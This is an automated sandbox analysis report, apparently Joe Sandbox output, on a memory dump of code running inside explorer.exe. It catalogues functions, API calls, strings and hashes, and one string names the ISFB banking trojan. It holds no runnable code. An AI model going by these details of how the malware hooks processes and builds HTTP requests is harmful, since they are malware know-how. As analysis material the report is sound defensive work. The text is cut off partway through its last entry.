Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: TimerWaitable$memset$CloseCreateFreeHandleHeapMultipleObjectsWait
String ID: MSVC$vids$vids
API String ID: 758393095-37656610
Opcode ID: ba655a56501589d03db9c3fd4e15e0555e9b7a65bd839ecec5cc6ad23541824c
Instruction ID: 17ba9935bc6583512341a3a8549a61dd07016b58e177e9f7d6b7ff67ae4e6f2e
Opcode Fuzzy Hash: ba655a56501589d03db9c3fd4e15e0555e9b7a65bd839ecec5cc6ad23541824c
Instruction Fuzzy Hash: BE613871509352AFD7219F29C84499FBBECFF85760F000A2AF5999A160D731D948CBD2

Uniqueness

Uniqueness Score: -1,00%

Function 0154250B, Relevance: 16.7, APIs: 11, Instructions: 172memorystringthreadCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 01542533
lstrlen.KERNEL32(?,?,?,?,00000001), ref: 015425D9
RtlAllocateHeap.NTDLL(00000000,?,?), ref: 01542601
lstrcpy.KERNEL32(00000228,?), ref: 01542621
lstrlen.KERNEL32(?), ref: 0154262B
memcpy.NTDLL(?,?,?), ref: 01542687
memcpy.NTDLL(?,?,?), ref: 0154269D
SwitchToThread.KERNEL32(?,00000000,?,?), ref: 015426C1
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 015426DC
HeapFree.KERNEL32(00000000,?,?), ref: 01542701
HeapFree.KERNEL32(00000000,?,?), ref: 0154271C

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$Free$lstrlenmemcpy$AllocateSwitchThreadlstrcpymemset
String ID:
API String ID: 3064595563-0
Opcode ID: f85d15e718ce672934ad501823e4b3e3fa1c002663f7edf84b55309e245b975a
Instruction ID: 81711e6170a55f9cca6c2c0f80218256c8e2821d88e9bd3ad45fdbd6ed3af011
Opcode Fuzzy Hash: f85d15e718ce672934ad501823e4b3e3fa1c002663f7edf84b55309e245b975a
Instruction Fuzzy Hash: 35518C71104315AFD720DF68E88599ABBE8FF88318F05492DF5AADB210CB30D9089B92

Uniqueness

Uniqueness Score: -1,00%

Function 01548FAA, Relevance: 16.5, APIs: 13, Instructions: 208stringmemoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040), ref: 01548FBA
lstrcmp.KERNEL32(?,0156E644), ref: 01548FE4
lstrcmp.KERNEL32(?,0156E654), ref: 01548FF5
lstrcmp.KERNEL32(?,0156E668), ref: 01549006
memcpy.NTDLL(00000000,?,00000014), ref: 01549022

Part of subcall function 01548535: lstrlen.KERNEL32(:status,00000000,015496BF), ref: 0154853D
Part of subcall function 01548535: LocalAlloc.KERNEL32(00000040,00000001), ref: 01548547
Part of subcall function 01548535: lstrcpy.KERNEL32(00000000,:status), ref: 01548551

LocalFree.KERNEL32(?), ref: 01549069
LocalFree.KERNEL32(?), ref: 01549079
LocalFree.KERNEL32(?), ref: 01549092
LocalAlloc.KERNEL32(00000040,00000000), ref: 015490B9
LocalFree.KERNEL32(?,?,?,?), ref: 015490FA
LocalFree.KERNEL32(?,?,?,?,?,?), ref: 01549136
LocalFree.KERNEL32(?,?,?,?,?,?), ref: 01549146
LocalFree.KERNEL32(?,?,?,?,?,?), ref: 01549163

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Local$Free$Alloclstrcmp$lstrcpylstrlenmemcpy
String ID:
API String ID: 2688743109-0
Opcode ID: 147f66b1c2e181504739605e9cd9fefb7d7f10b4a41cf0333773760be66b672b
Instruction ID: d3adc308fa4d7965028d545436dfc8ad0e877c2da952daeb8c2609a121af7699
Opcode Fuzzy Hash: 147f66b1c2e181504739605e9cd9fefb7d7f10b4a41cf0333773760be66b672b
Instruction Fuzzy Hash: 9081CEB5D01216DFDF22DF98C8868AEBBB6FF48718B250056E958AF215C7319841DFE0

Uniqueness

Uniqueness Score: -1,00%

Function 0154127C, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 156memoryfilestringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 015412C2
RtlAllocateHeap.NTDLL(00000000,?), ref: 01541391
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 015413C1
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 015413DA
CloseHandle.KERNEL32(00000000), ref: 015413E4
HeapFree.KERNEL32(00000000,?), ref: 015413F4
HeapFree.KERNEL32(00000000,00000000), ref: 0154140F
HeapFree.KERNEL32(00000000,?), ref: 0154141F

Strings

ISFB, xrefs: 01541374, 01541379, 015413A1

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$Free$File$AllocateCloseCreateHandleWritelstrcpy
String ID: ISFB
API String ID: 1002670662-2538836093
Opcode ID: 15e92fbbafaad664319fff7350eadfa4433dd8164f690f393b66ec5c06a824c8
Instruction ID: ae3492be4b2e939f990634ad1d62d6de650a8a54d69b8fbf3ea5486d3049b4d3
Opcode Fuzzy Hash: 15e92fbbafaad664319fff7350eadfa4433dd8164f690f393b66ec5c06a824c8
Instruction Fuzzy Hash: EA516D76400119BFDF219FA8DC84CAE7F79FF05258B124065F619EB124C7319E49ABA1

Uniqueness

Uniqueness Score: -1,00%

Function 01544F6F, Relevance: 15.1, APIs: 10, Instructions: 146memoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 01544FAA
wsprintfA.USER32 ref: 01544FF6
GetTickCount.KERNEL32 ref: 01545031
RtlEnterCriticalSection.NTDLL(0159940C), ref: 01545045
RtlLeaveCriticalSection.NTDLL(0159940C), ref: 01545063
HeapFree.KERNEL32(00000000,?,00000000), ref: 0154511C
HeapFree.KERNEL32(00000000,00000000,0159B2F5), ref: 0154512B
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0154513A
HeapFree.KERNEL32(00000000,00000000), ref: 01545149
HeapFree.KERNEL32(00000000,?), ref: 0154515B

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: FreeHeap$CountCriticalSectionTick$EnterLeavewsprintf
String ID:
API String ID: 2687870354-0
Opcode ID: 50c003bb9734d3c6d911030fd21b12cdda81fb5fe432f0fa62d737dc176a43ce
Instruction ID: 1f3997987e5e8604ebe8fd748553e8444b62fa1e7959d7590b5354f397de959d
Opcode Fuzzy Hash: 50c003bb9734d3c6d911030fd21b12cdda81fb5fe432f0fa62d737dc176a43ce
Instruction Fuzzy Hash: FD51C835101205BFDB219B69EC4AF1E7FA5FB4A718F070024F6289F264DB719819FB62

Uniqueness

Uniqueness Score: -1,00%

Function 015524A4, Relevance: 15.1, APIs: 10, Instructions: 108pipesynchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 015524E2
ConnectNamedPipe.KERNEL32(?,?), ref: 01552512
GetLastError.KERNEL32 ref: 0155251C
FlushFileBuffers.KERNEL32(?), ref: 01552583
DisconnectNamedPipe.KERNEL32(?,?,?,0000000C,00000000), ref: 0155258C
WaitForSingleObject.KERNEL32(01599004,00000000), ref: 01552599
CloseHandle.KERNEL32(?), ref: 015525AE
GetLastError.KERNEL32 ref: 015525BB
CloseHandle.KERNEL32(?), ref: 015525C8

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: CloseErrorHandleLastNamedPipe$BuffersConnectCreateDisconnectEventFileFlushObjectSingleWait
String ID:
API String ID: 1672224233-0
Opcode ID: 87ebd096a453fb8cc703c5737c740f7e53e9e19a41cecdcc8f97a3793c60ebd0
Instruction ID: 8afa0ea5d26ac165ca077fc0ace2a9f23dbe0d3a02563d1fdb729c6316eb9ba8
Opcode Fuzzy Hash: 87ebd096a453fb8cc703c5737c740f7e53e9e19a41cecdcc8f97a3793c60ebd0
Instruction Fuzzy Hash: 6E31C270005201EFE7518F68DC9596EBBE9FB44364F01492AF96ADE1A0D7308D49DFA2

Uniqueness

Uniqueness Score: -1,00%

Function 0156A1A3, Relevance: 15.1, APIs: 10, Instructions: 64sleepsynchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,0156A192), ref: 0156A1B7

Part of subcall function 015698B4: InterlockedExchange.KERNEL32(?,000000FF), ref: 015698BB

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0156A1D1
CloseHandle.KERNEL32(00000000), ref: 0156A1DA
CloseHandle.KERNEL32(?), ref: 0156A1E8
RtlEnterCriticalSection.NTDLL(?), ref: 0156A1F4
RtlLeaveCriticalSection.NTDLL(?), ref: 0156A21D
Sleep.KERNEL32(000001F4), ref: 0156A22C
CloseHandle.KERNEL32(?), ref: 0156A239
LocalFree.KERNEL32(?), ref: 0156A247
RtlDeleteCriticalSection.NTDLL(?), ref: 0156A251

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
String ID:
API String ID: 1408595562-0
Opcode ID: d79aff3bd3df9292443f3001f82b002c3bf70ea23242200e855f1d4a664bde07
Instruction ID: 3d77b27fa006e9e76877a73029de90bed87f2a3055425267b7c345a64444c630
Opcode Fuzzy Hash: d79aff3bd3df9292443f3001f82b002c3bf70ea23242200e855f1d4a664bde07
Instruction Fuzzy Hash: 2B117C39141626DFEB30AB78E84995F7BBCFF447117050914F2A2AB169CB32E448DBE0

Uniqueness

Uniqueness Score: -1,00%

Function 0155F5EB, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 111memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 015634DA: lstrcmp.KERNEL32(?,0000007F), ref: 0156358B

VirtualProtect.KERNEL32(00000000,00000004,00000040,00000000,?,00000000,00000000,015934D0,00000014,0155F78A,00000002,00000000,00000001,01598FD4,?,01598FD4), ref: 0155F625
GetLastError.KERNEL32(?,0155F9A7,00000000,?,00000000,?,0155184C,?,00000000,01598FD4), ref: 0155F723

Part of subcall function 0155F528: lstrlen.KERNEL32(?,?,00000000,?,0155184C), ref: 0155F560
Part of subcall function 0155F528: lstrcpy.KERNEL32(00000000,?), ref: 0155F577
Part of subcall function 0155F528: GetModuleHandleA.KERNEL32(00000000,?,0155184C), ref: 0155F59E

VirtualProtect.KERNEL32(00000000,00000005,00000040,?,?,?,00000000,0155184C,?,0155F9A7,00000000,?,00000000,?,0155184C,?), ref: 0155F67A
VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,?,0155F9A7,00000000,?,00000000), ref: 0155F6B2
VirtualProtect.KERNEL32(00000000,00000004,00000000,00000000,?,?,00000000,0155184C,?,0155F9A7,00000000,?,00000000,?,0155184C,?), ref: 0155F6CA
RtlEnterCriticalSection.NTDLL(01599400), ref: 0155F6DD
RtlLeaveCriticalSection.NTDLL(01599400), ref: 0155F6FB

Strings

, xrefs: 0155F6A1

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: ProtectVirtual$CriticalSection$EnterErrorHandleLastLeaveModulelstrcmplstrcpylstrlen
String ID:
API String ID: 52015641-3916222277
Opcode ID: 9a7d1f26988cc36f9f999ab24f1e56856143e0cc91460a85ef82bffdb537ec0a
Instruction ID: ab02f30a00b75a24773fe10ba2e1395bf946aa188106c797a01475cef25b92ef
Opcode Fuzzy Hash: 9a7d1f26988cc36f9f999ab24f1e56856143e0cc91460a85ef82bffdb537ec0a
Instruction Fuzzy Hash: 0741697450030ADFDB20CF68D988AAEBBF8FF44710F01850AE956AB290D774E905DFA1

Uniqueness

Uniqueness Score: -1,00%

Function 01547E8B, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 86memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(Host:,?,01598FD4), ref: 01547ED1
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 01547F12
memcpy.NTDLL(00000000,http://,00000007,?,01598FD4), ref: 01547F37
memcpy.NTDLL(00000000,00000000,01598FD4,00000000,http://,00000007,?,01598FD4), ref: 01547F46
memcpy.NTDLL(01598FD4,?,?,00000000,00000000,01598FD4,00000000,http://,00000007,?,01598FD4), ref: 01547F58

Strings

http://, xrefs: 01547F2C
https://, xrefs: 01547F23, 01547F35
Host:, xrefs: 01547EC3, 01547ECD, 01547ED7

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID: Host:$http://$https://
API String ID: 1819133394-2811860193
Opcode ID: 00048a3faf14e5701e9c02f27fd4f868ba69d1e998a00aab102de22abd486355
Instruction ID: 52f7165956c9ce25298357c612449266abe5230f336fbd0d2e8aabba84ad71c4
Opcode Fuzzy Hash: 00048a3faf14e5701e9c02f27fd4f868ba69d1e998a00aab102de22abd486355
Instruction Fuzzy Hash: F921B172E0030AFBDB219BA9C844E9EFBB9FF88704F114161E514EF200E7319A55DBA0

Uniqueness

Uniqueness Score: -1,00%

Function 01552D50, Relevance: 13.8, APIs: 3, Strings: 6, Instructions: 289COMMON

Download Yara Rule

Strings

Content-Type:, xrefs: 01552DFA, 01552DFF, 01552E06
Content-Length:, xrefs: 0155305C
Content-Encoding:, xrefs: 01552E78, 01552E7D, 01552E84, 01552F52
HTTP, xrefs: 01552D71
Transfer-Encoding:, xrefs: 01553039
POST, xrefs: 01552D79

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID:
String ID: Content-Encoding:$Content-Length:$Content-Type:$HTTP$POST$Transfer-Encoding:
API String ID: 0-2296292728
Opcode ID: 79644f5faf86e7e116ae5fb812c1ff7ec5cd56f5731249725e1a9ada3eb7c4ca
Instruction ID: 22fc01275ed049c8ed008d56b2bf2f69e2324b09dff7047f0b68b0ae4f62fe67
Opcode Fuzzy Hash: 79644f5faf86e7e116ae5fb812c1ff7ec5cd56f5731249725e1a9ada3eb7c4ca
Instruction Fuzzy Hash: 50B14530105206AFDBA1EF29CC94A6ABBA5FF88354F05441AFD189F225C771D845DBA2

Uniqueness

Uniqueness Score: -1,00%

Function 01555D0C, Relevance: 13.7, APIs: 9, Instructions: 191stringmemoryCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 01555D77
RtlAllocateHeap.NTDLL(00000000,?), ref: 01555D8B
CreateDirectoryW.KERNEL32(00000000,00000000), ref: 01555DC0
lstrcpy.KERNEL32(?,?), ref: 01555DEB
lstrcpyW.KERNEL32(00000000), ref: 01555E51
lstrlenW.KERNEL32(00000000), ref: 01555E58
lstrlenW.KERNEL32(00000000), ref: 01555F14
HeapFree.KERNEL32(00000000,?), ref: 01555F50
HeapFree.KERNEL32(00000000,00000000), ref: 01555F68

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heaplstrlen$Freelstrcpy$AllocateCreateDirectory
String ID:
API String ID: 3157678350-0
Opcode ID: 0cb7906174c13c730c750e556b870bcd64cb2864b5d7108e611f754a19db48ea
Instruction ID: b5a0c75eeea6a80572f4ffc04b0b1742044656946bbcd93093d49b75f901dbde
Opcode Fuzzy Hash: 0cb7906174c13c730c750e556b870bcd64cb2864b5d7108e611f754a19db48ea
Instruction Fuzzy Hash: FA61AD71500109BFDB22AF64DC89FEE7BB9FF49710F020051F925AA154E7709A48EFA1

Uniqueness

Uniqueness Score: -1,00%

Function 01548053, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 130memoryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0154808F
HeapFree.KERNEL32(00000000,00000000), ref: 015480A9
memcpy.NTDLL(?,?,00000000,?,01552DED,?,?,?,?,?,0155370A,?,00000000), ref: 015480C8

Strings

POST, xrefs: 015480F7
Content-Length:, xrefs: 0154810E, 01548113, 01548116
chun, xrefs: 01548186
Referer: , xrefs: 01548195, 0154819A, 015481A1
HTTP, xrefs: 015480EB
Transfer-Encoding:, xrefs: 01548158, 0154815D, 01548164

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: FreeHeapmemcpymemset
String ID: Content-Length:$HTTP$POST$Referer: $Transfer-Encoding:$chun
API String ID: 2272576838-1096462370
Opcode ID: 3626de67733960e4011696e5060d3df99a181d407f693cfdcc746a12046a66b7
Instruction ID: a5bde66fb6c67de102ceeaf4171a2c17bbc63a178df233c63a70c836cb813dcf
Opcode Fuzzy Hash: 3626de67733960e4011696e5060d3df99a181d407f693cfdcc746a12046a66b7
Instruction Fuzzy Hash: 1041B0315003069FD731CFA9CC44A1BBBEAFF95608F05492AE5658B220D730E819DBA2

Uniqueness

Uniqueness Score: -1,00%

Function 01550798, Relevance: 13.6, APIs: 9, Instructions: 124memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0154650C: RtlEnterCriticalSection.NTDLL(01599448), ref: 01546514
Part of subcall function 0154650C: RtlLeaveCriticalSection.NTDLL(01599448), ref: 01546529
Part of subcall function 0154650C: InterlockedIncrement.KERNEL32(00000014), ref: 01546542

RtlAllocateHeap.NTDLL(00000000,00000018,0159B2A3), ref: 015507CE
memset.NTDLL ref: 015507DF
lstrcmpi.KERNEL32(?,?), ref: 0155081F
RtlAllocateHeap.NTDLL(00000000,?), ref: 01550848
memcpy.NTDLL(00000000,?,?), ref: 0155085C
memset.NTDLL ref: 01550869
memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 01550882
memcpy.NTDLL(-00000005,0159A3D5,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 0155089D
HeapFree.KERNEL32(00000000,?), ref: 015508BA

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
String ID:
API String ID: 694413484-0
Opcode ID: 56cd723233d52a7fdc113ef9b318215e1d2075802b95b22311101ac680888670
Instruction ID: af155510e8019ea8a159f7ee7ed3229b8281f28deac87162950e5022a1e2de5d
Opcode Fuzzy Hash: 56cd723233d52a7fdc113ef9b318215e1d2075802b95b22311101ac680888670
Instruction Fuzzy Hash: 2E41A071E0021AEFEF609FA8CC84F9D7BB5FF44324F15402AE915AB290D7719A459B90

Uniqueness

Uniqueness Score: -1,00%

Function 01551B97, Relevance: 13.6, APIs: 9, Instructions: 113memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000), ref: 01551C0A
RtlAllocateHeap.NTDLL(00000000,01598B26), ref: 01551C20
memcpy.NTDLL(00000000,00000000,01598B24), ref: 01551C33
_wcsupr.NTDLL ref: 01551C3E
lstrlenW.KERNEL32(?,01598B24), ref: 01551C6C
RtlAllocateHeap.NTDLL(00000000,?,01598B24), ref: 01551C81
lstrcpyW.KERNEL32(00000000,?), ref: 01551C97
lstrcatW.KERNEL32(00000000,0159A928), ref: 01551CB5
HeapFree.KERNEL32(00000000,00000000), ref: 01551CC4

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$Allocatelstrlen$Free_wcsuprlstrcatlstrcpymemcpy
String ID:
API String ID: 632491215-0
Opcode ID: 1080430e6f9c900187a50892797daf833c826d357d26cf3dbe07864522bfb1c2
Instruction ID: d21c6e8940d826e69a928e73fd3c0986d64a0a5681846ab09900d2f870656114
Opcode Fuzzy Hash: 1080430e6f9c900187a50892797daf833c826d357d26cf3dbe07864522bfb1c2
Instruction Fuzzy Hash: C1312A36100604AFD3715F7CDCC8B6F7FA9FB89220B16051AFA25CF255DB7198059B91

Uniqueness

Uniqueness Score: -1,00%

Function 01547966, Relevance: 13.6, APIs: 9, Instructions: 107COMMON

Download Yara Rule

APIs

Part of subcall function 0155FDA6: lstrlenW.KERNEL32(00000000,?,00000000,01547976,?,?,00000000,?,?,?,?,015414D1,00000000,00000000,00000004), ref: 0155FDC1

GetFileAttributesA.KERNEL32(00000000,?,?,00000000,?,?,?,?,015414D1,00000000,00000000,00000004), ref: 01547986

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: AttributesFilelstrlen
String ID:
API String ID: 309479419-0
Opcode ID: 051a8c71a42118ff6c2dc89753efd1453228b2fdacae1fcb5dd802ace99f19e4
Instruction ID: 7129a67483ca3bc0b867e9645aae3a432d83155975798a53732b6f0ec520d5ff
Opcode Fuzzy Hash: 051a8c71a42118ff6c2dc89753efd1453228b2fdacae1fcb5dd802ace99f19e4
Instruction Fuzzy Hash: 42313735400114BBEB329B7A9C49EAF7F69FB89724F124611F425AF290D7B14E0497A0

Uniqueness

Uniqueness Score: -1,00%

Function 01552296, Relevance: 13.6, APIs: 9, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000098,00000000,01552399,?,00000010,0000000C,00000001,00000000,00000000,00000010,?), ref: 015522B5
WriteFile.KERNEL32(?,00000001,?,?,?), ref: 015522E9
ReadFile.KERNEL32(?,00000001,?,?,?), ref: 015522F1
GetLastError.KERNEL32 ref: 015522FB
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00002710), ref: 01552317
GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 01552330
CancelIo.KERNEL32(?), ref: 01552345
CloseHandle.KERNEL32(?), ref: 01552355
GetLastError.KERNEL32 ref: 0155235D

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
String ID:
API String ID: 4263211335-0
Opcode ID: 2b295fc8ada555291073b57f959ab853bb9cd03b923930fd3ac4e74d444369a8
Instruction ID: 5af1c40725e2fc8d63e49c6cf81bd6cfe2040f2e1de4c3946cacea659eb96328
Opcode Fuzzy Hash: 2b295fc8ada555291073b57f959ab853bb9cd03b923930fd3ac4e74d444369a8
Instruction Fuzzy Hash: BC21AD36900118EFDB119FACDC498EE7B7AFB48320F018426FA29DB151D7308A44DBA1

Uniqueness

Uniqueness Score: -1,00%

Function 01541825, Relevance: 13.6, APIs: 9, Instructions: 76memoryfileCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 0154183C
GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,015430B0,00000000,-11A63CEA,?,00000000,01599008), ref: 0154184E
wsprintfA.USER32 ref: 0154186F
CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 01541885
WriteFile.KERNEL32(00000000,00010000,?,00000000), ref: 015418A4
GetLastError.KERNEL32(?,00000000,01599008), ref: 015418B2
CloseHandle.KERNEL32(00000000), ref: 015418BB
GetLastError.KERNEL32(?,00000000,?,015430B0,00000000,-11A63CEA,?,00000000,01599008), ref: 015418CC
HeapFree.KERNEL32(00000000,00000000), ref: 015418DC

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: ErrorFileHeapLast$AllocateCloseCreateDirectoryFreeHandleWindowsWritewsprintf
String ID:
API String ID: 2621919937-0
Opcode ID: a6f8a2c84a6e9b61c5b421b01fed8bb8d085eff2a54e48f61e0e2ac815690978
Instruction ID: ef03590f20b7dc9f962de6c4d03385017a23342548f5ac3f4e85e95513cdbf97
Opcode Fuzzy Hash: a6f8a2c84a6e9b61c5b421b01fed8bb8d085eff2a54e48f61e0e2ac815690978
Instruction Fuzzy Hash: DC11D6751016187FF2316A69AC8DE7B3F5DFB42779F020024F615DB154D7611C8893B2

Uniqueness

Uniqueness Score: -1,00%

Function 015481C8, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 110memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 0154827D
memcpy.NTDLL(00000000,00000002,?,?,?,?), ref: 0154828E
memcpy.NTDLL(00000000,00000001,00000001,?,?,?,?,?,?), ref: 015482A4
memcpy.NTDLL(00000000,?,?,00000000,00000001,00000001,?,?,?,?,?,?), ref: 015482B6
memcpy.NTDLL(00000000,0156E5D4,00000002,00000000,?,?,00000000,00000001,00000001,?,?,?,?,?,?), ref: 015482C9
memcpy.NTDLL(00000000,00000000,00000002,?,?,?,?,?,?), ref: 015482DE

Strings

Content-Encoding:, xrefs: 015481D5

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: memcpy$AllocateHeap
String ID: Content-Encoding:
API String ID: 4068229299-2618068792
Opcode ID: fff53c196a01f0631c469862b5ac8ec4bbfab48de72202a794edc54eb210e211
Instruction ID: 6c5c181b52b6be41d14e18c74c2525acabecda73e033d499f1cf3fc4959bf899
Opcode Fuzzy Hash: fff53c196a01f0631c469862b5ac8ec4bbfab48de72202a794edc54eb210e211
Instruction Fuzzy Hash: E2413B76D0020AEFDF10DFE8CC85AAEBBB9FF58218F154455E915AB200E731AB54DB90

Uniqueness

Uniqueness Score: -1,00%

Function 01541D63, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79memoryfilestringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 01541DA2
lstrcpyW.KERNEL32(00000000,01541FA0), ref: 01541DB3
CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,01541FA0,?,?), ref: 01541DCA
CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,01541FA0,?,?), ref: 01541DE3
CopyFileW.KERNEL32(?,00000000,00000000), ref: 01541E12
HeapFree.KERNEL32(00000000,00000000), ref: 01541E20

Strings

\sols, xrefs: 01541D63, 01541D84, 01541DC3

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
String ID: \sols
API String ID: 2686460493-25449109
Opcode ID: 2a3d0952d928bcb4f4d83ea061fa390256af3400a0d567c2f202ca369c74d119
Instruction ID: b3be70d2814444a7c6709baed5f5a028056166ff54f32cfbb955f879e4a9ad8e
Opcode Fuzzy Hash: 2a3d0952d928bcb4f4d83ea061fa390256af3400a0d567c2f202ca369c74d119
Instruction Fuzzy Hash: 4D210136101205AFD331AF28CC89E7B7FACFF85754F06041CF5549B220EB71A809ABA1

Uniqueness

Uniqueness Score: -1,00%

Function 0156991E, Relevance: 12.2, APIs: 8, Instructions: 248memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 01569994
VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 015699B7
GetLastError.KERNEL32 ref: 01569BEE
RtlEnterCriticalSection.NTDLL(?), ref: 01569BFE
RtlLeaveCriticalSection.NTDLL(?), ref: 01569C0F

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: AllocCriticalSectionVirtual$EnterErrorLastLeave
String ID:
API String ID: 4127793648-0
Opcode ID: ba60e3403e00d8c753558d7d76a33e551ada189c8ea6442f796e9da75937ca92
Instruction ID: 8ced955d2409ec90da30dd662fcf44e4a05f729ead4b1e710d1bcf75c843d8f5
Opcode Fuzzy Hash: ba60e3403e00d8c753558d7d76a33e551ada189c8ea6442f796e9da75937ca92
